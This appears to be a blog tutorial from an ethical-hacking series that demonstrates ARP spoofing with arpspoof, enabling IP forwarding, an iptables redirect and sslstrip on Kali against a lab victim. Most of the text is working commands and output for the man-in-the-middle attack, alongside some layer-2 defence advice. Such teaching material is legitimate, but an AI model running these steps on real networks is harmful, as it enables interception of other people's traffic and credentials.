Ethical Hacking Fridays: How to Hack (Part 10) ARP Spoofing and SSL Strip
ARP Spoofing
As a network architect, I can’t emphasise enough to implement the necessary security precautions at layer-2. I’ve seen so many networks where layer-2 is just implemented as standard. You really should be looking at 802.1x authentication, ARP inspection, and private VLANs as a minimum. Don’t just implement a basic layer-2 network with no additional security or you will regret it.
For this tutorial, I’m going to use my test victim machine on 192.168.1.1. In the real world you may not know the IP address of the victim. Using a tool called the Network Mapper (“nmap”) you can carry out a network scan and detect most if not all the devices on the segment.
Before we get too that we should really find out what the default gateway (router) is on the network. We can see it is 192.168.1.254.
root@kali:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.1.254 0.0.0.0 UG 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0We can also see that my Kali instance is running on 192.168.1.2.
root@kali:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:24:30:b1 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.2/24 brd 192.168.1.255 scope global noprefixroute eth0
valid_lft forever preferred_lft foreverWe will want to exclude the router and ourselves from the scan in order to save time.
root@kali:~# nmap 192.168.1.1,3-253 -vv
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-20 10:49 BST
Initiating ARP Ping Scan at 10:49
Scanning 252 hosts [1 port/host]This can take some time but will return the hosts on the network segment and what ports they are listening on. You could also include additional parameters as well if you want.
In the real world you wouldn’t have access to the victim machine but just for interest sake let’s look at the current normal state.
% arp 192.168.1.254
? (192.168.1.254) at e8:ad:a6:d0:44:b1 on en1 ifscope [ethernet]We can see that the victim currently thinks the router MAC is e8:ad:a6:d0:44:b1 which it is.
We also can do a traceroute externally to 8.8.8.8 and the next hop is the router.
% traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 64 hops max, 52 byte packets
1 192.168.1.254 (192.168.1.254) 1.407 ms 1.072 ms 1.081 msSo that all looks good so far…
Now let’s hop back over to our Kali instance. We are going to run “arpspoof” by providing the interface “eth0”, the victim IP “192.168.1.1”, and default gateway “192.168.1.254”. As long as this is running the ARP attack is happening.
root@kali:~# arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.254
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 8:0:27:24:30:b1
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at 8:0:27:24:30:b1
Let’s look what is happening on the victim…
% arp 192.168.1.254
? (192.168.1.254) at 8:0:27:24:30:b1 on en1 ifscope [ethernet]Well this isn’t good!
The victim machine now thinks the MAC of the default gateway router is 8:0:27:24:30:b1. The actual default gateway is e8:ad:a6:d0:44:b1.
% traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 64 hops max, 52 byte packets
1 192.168.1.2 (192.168.1.2) 0.447 ms 0.267 ms 0.198 ms You can see now that all traffic is routing to my Kali instance first.
This isn’t going to be much good as a linux host will not route traffic by default. If traffic is directed at it which does not belong to it then it will be dropped.
In order for this to work we need to configure Kali as a router so it can forward packets.
root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1Now let’s try the traceroute again from our victim…
% traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 64 hops max, 52 byte packets
1 192.168.1.2 (192.168.1.2) 0.447 ms 0.267 ms 0.198 ms
2 192.168.1.254 (192.168.1.254) 1.371 ms 1.164 ms 1.227 msTraffic from my victim is now routing via my Kali instance and aside from it being slightly slower it is hardly noticeable.
Just for interest sake if you want to stop the ARP spoofing attack press Ctrl+C and the “arpspoof” tool will clear up everything automatically. Everything will go back to normal on the victim machine.
^CCleaning up and re-arping targets...
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at e8:ad:a6:e0:45:a1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 28:f0:76:46:d1:3a
8:0:27:24:30:b1 28:f0:76:45:c1:2a 0806 42: arp reply 192.168.1.254 is-at e8:ad:a6:e0:45:a1
8:0:27:24:30:b1 e8:ad:a6:d0:44:b1 0806 42: arp reply 192.168.1.1 is-at 28:f0:76:46:d1:3aSo all traffic is now routing via our Kali instance. Today most sites are encrypted using HTTPS/SSL. So what you will see through your Kali instance won’t really be that interesting aside from seeing what sites the victim is browsing. What would be great is if there was a way of decrypting that traffic on the fly using a “man-in-the-middle” attack.
This is where the tool, “sslstrip” comes into play. Please note that many browsers have preventative measures to protect against this now. Not all browsers will allow this to happen, so the victim would need to be using an old or non-standard browser. I mean it is highly unlikely Chrome and Firefox will return any results these days. I have not tried Safari or Internet Explorer but maybe they would. You would mainly be targetting poorly maintained IT infrastructure or devices that have not been properly looked after.
SSL Strip
If you have tried to install SSL Strip in Kali from 2020 onwards you’ll notice it is not a trivial task. You will probably find yourself working through error after error and still not get it working. I managed to get it working as follows.
- Clone SSL Strip from the Github repo
root@kali:~# apt install git -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
git is already the newest version (1:2.28.0-1).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.root@kali:~# git clone https://github.com/moxie0/sslstrip
Cloning into 'sslstrip'...
remote: Enumerating objects: 42, done.
remote: Total 42 (delta 0), reused 0 (delta 0), pack-reused 42
Unpacking objects: 100% (42/42), 30.58 KiB | 1.27 MiB/s, done.- Install Python package manager “pip”
root@kali:~# apt install python3-pip -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3-pip is already the newest version (20.1.1-2).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.- Install Python “virtualenv” using “pip3”.
root@kali:~# pip3 install virtualenv
Requirement already satisfied: virtualenv in /usr/local/lib/python3.8/dist-packages (20.0.35)
Requirement already satisfied: six<2,>=1.9.0 in /usr/local/lib/python3.8/dist-packages (from virtualenv) (1.15.0)
Requirement already satisfied: filelock<4,>=3.0.0 in /usr/local/lib/python3.8/dist-packages (from virtualenv) (3.0.12)
Requirement already satisfied: distlib<1,>=0.3.1 in /usr/local/lib/python3.8/dist-packages (from virtualenv) (0.3.1)
Requirement already satisfied: appdirs<2,>=1.4.3 in /usr/lib/python3/dist-packages (from virtualenv) (1.4.4)- Create your Python virtual environment using Python 2 ←
root@kali:~# virtualenv -p python2 sslstripenv
created virtual environment CPython2.7.18.final.0-64 in 111ms
creator CPython2Posix(dest=/root/sslstripenv, clear=False, global=False)
seeder FromAppData(download=False, pip=bundle, setuptools=bundle, wheel=bundle, via=copy, app_data_dir=/root/.local/share/virtualenv)
added seed packages: pip==20.2.3, setuptools==44.1.1, wheel==0.35.1
activators BashActivator,CShellActivator,FishActivator,PowerShellActivator,PythonActivator- Load your “sslstripenv” virtual environment.
root@kali:~# . sslstripenv/bin/activate
(sslstripenv) root@kali:~#- Go to your Git cloned “sslstrip” directory.
(sslstripenv) root@kali:~# cd sslstrip
(sslstripenv) root@kali:~/sslstrip#- Install the following dependencies using “pip”.
(sslstripenv) root@kali:~/sslstrip# pip install Twisted pyOpenSSL service_identity*** INSTALLATION PROCESS ***- If all has gone to plan “sslstrip.py” should run now.
(sslstripenv) root@kali:~/sslstrip# python sslstrip.py -h
/root/sslstripenv/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
from cryptography import x509sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.You can ignore that warning as “sslstrip” only seems to work with Python 2 these days. If you try and use Python and/or PIP version 3 you will open the pandoras box of issues. The way you resolve this is create a Python 2 virtual environment and then it works.
In case you are not familiar with Python virtual environments the way you exit is type “deactivate”.
(sslstripenv) root@kali:~/sslstrip# deactivate
root@kali:~/sslstrip#If you want to enter again you do as follows.
root@kali:~/sslstrip# cd
root@kali:~# . sslstripenv/bin/activate
(sslstripenv) root@kali:~# cd sslstrip
(sslstripenv) root@kali:~/sslstrip# python sslstrip.py -hBasic Usage
“sslstrip” listens for traffic on a particular port, so we need to use “iptables” to listen for HTTPS traffic on the port and forward it to “sslstrip” on the configurable port TCP 8080.
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080And let’s verify it is there…
root@kali:~# iptables -t nat -L -v -n
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destinationChain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destinationChain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destinationroot@kali:~# iptables -t nat -L PREROUTING
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8080“ssltrip” will convert HTTPS connections to HTTP, and as the name suggests to strip the encryption layer. “sslstrip” keeps track of the state and unencrypted responses from the client will be passed to the server in encrypted form.
You then need to run “sslstrip” on the configured port, which in our case is TCP 8080.
(sslstripenv) root@kali:~/sslstrip# python sslstrip.py -l 8080
/root/sslstripenv/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
from cryptography import x509sslstrip 0.9 by Moxie Marlinspike running...Now provided you are using ARP spoofing to direct traffic at your Kali instance, IP Tables is configured properly, you are running SSL Strip, and the victim is using a vulnerable browser when they browse to HTTPS sites you should see it logged here.
A good idea is too open up another terminal window and “tail” the “sslstrip” log file. This will allow you to view the results without interrupting the tool.
root@kali:~/sslstrip# tail -f -n 0 sslstrip.log